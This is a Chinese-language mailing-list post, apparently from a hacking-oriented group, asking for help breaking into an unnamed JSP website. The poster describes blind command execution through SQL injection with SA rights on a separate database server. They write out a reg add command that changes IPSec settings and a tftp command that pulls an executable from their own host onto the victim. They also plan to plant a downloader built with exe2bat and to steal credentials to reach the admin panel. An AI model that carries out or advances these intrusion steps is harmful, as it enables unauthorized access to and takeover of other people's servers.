某独立JSP网站(只开80端口) sql注入 SA权限 能执行命令但无回显 能读注册表 能DIR目录 不过好象是web与数据库分离,因为DIR列目录的时候只有C、D两个盘,找不到web目录 数据库服务器2003系统 无法对外访问 IPsec禁用,修改注册表(reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSec\ /v NoDefaultExempt /t REG_DWORD /d 00000000 /f) 后,使用 tftp -i host get 11.exe 123.exe TFTP服务器没反应,所以应该用exe2bat转个下载者再一句句写到服务器上,然后执行,应该也没有用 怎么样才能取得网站后台???
就算在数据库服务器建立虚拟目录,但不知道服务器IP,也没有用。 忘了说了 无法猜解表,但可知道数据库名 我现在想法是:先找到数据库服务器ip,然后连接上去,找到用户名和密码,然后再到网站的管理登录页面(虽然现在也找不到) -- ====================================================================================== n3tl04d --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
